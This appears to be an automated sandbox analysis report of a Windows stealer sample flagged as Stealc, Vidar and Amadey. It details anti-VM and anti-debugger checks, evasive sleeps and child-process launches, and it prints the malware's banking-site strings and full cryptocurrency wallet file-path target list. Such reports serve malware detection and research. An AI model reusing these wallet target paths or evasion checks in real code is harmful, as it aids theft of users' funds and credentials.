Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10F0966 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_05110AF9 rdtsc 14_2_05110AF9
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6308 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6308 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6448 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4568 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2404 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2404 Thread sleep time: -66033s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2328 Thread sleep time: -56028s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3796 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3796 Thread sleep time: -70035s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4256 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7972 Thread sleep count: 44 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7972 Thread sleep time: -1320000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7972 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Documents\KKFBAAFCGI.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C97C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C97C930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: KJJJKFII.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: skotes.exe, skotes.exe, 00000010.00000002.2746340415.0000000001045000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000011.00000002.3365263750.0000000001045000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: KJJJKFII.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: KJJJKFII.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: KJJJKFII.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: KJJJKFII.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: skotes.exe, 00000011.00000002.3366797627.0000000001918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!t
Source: KJJJKFII.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2685963034.0000000001125000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2685963034.0000000001154000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3366797627.0000000001918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: KJJJKFII.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000002.2685963034.0000000001154000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWl
Source: KJJJKFII.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: KJJJKFII.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: KJJJKFII.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: KJJJKFII.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: KJJJKFII.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: KJJJKFII.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: KJJJKFII.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: KJJJKFII.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: KJJJKFII.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000002.2685963034.00000000010DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: KJJJKFII.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: KJJJKFII.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: KJJJKFII.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: KJJJKFII.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: KJJJKFII.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: KJJJKFII.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2684981557.0000000000CAF000.00000040.00000001.01000000.00000003.sdmp, KKFBAAFCGI.exe, 0000000E.00000002.2717420643.0000000000695000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000F.00000002.2747213987.0000000001045000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000010.00000002.2746340415.0000000001045000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000011.00000002.3365263750.0000000001045000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: skotes.exe, 00000011.00000002.3366797627.00000000018E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: KJJJKFII.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: KJJJKFII.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_05110AF9 rdtsc 14_2_05110AF9
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C9C5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C963480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C963480
Contains functionality to read the PEB
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004D652B mov eax, dword ptr fs:[00000030h] 14_2_004D652B
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004DA302 mov eax, dword ptr fs:[00000030h] 14_2_004DA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E8A302 mov eax, dword ptr fs:[00000030h] 15_2_00E8A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E8652B mov eax, dword ptr fs:[00000030h] 15_2_00E8652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E8A302 mov eax, dword ptr fs:[00000030h] 16_2_00E8A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E8652B mov eax, dword ptr fs:[00000030h] 16_2_00E8652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C99B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C99B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C99B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C99B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CB4AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 4340, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KKFBAAFCGI.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\KKFBAAFCGI.exe "C:\Users\user\Documents\KKFBAAFCGI.exe" Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB94760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6CB94760
Source: skotes.exe, skotes.exe, 00000010.00000002.2746550153.0000000001089000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000011.00000002.3365558410.0000000001089000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: LProgram Manager
Source: file.exe, file.exe, 00000000.00000002.2684981557.0000000000CAF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1PProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C99B341 cpuid 0_2_6C99B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9635A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C9635A0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 16.2.skotes.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.skotes.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.KKFBAAFCGI.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.skotes.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.3364528536.0000000000E51000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2716334004.00000000004A1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2746064042.0000000000E51000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2746813469.0000000000E51000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2685963034.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2126870772.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2684323133.00000000008D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4340, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4340, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2684323133.0000000000985000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Electrum
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2684323133.0000000000A37000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
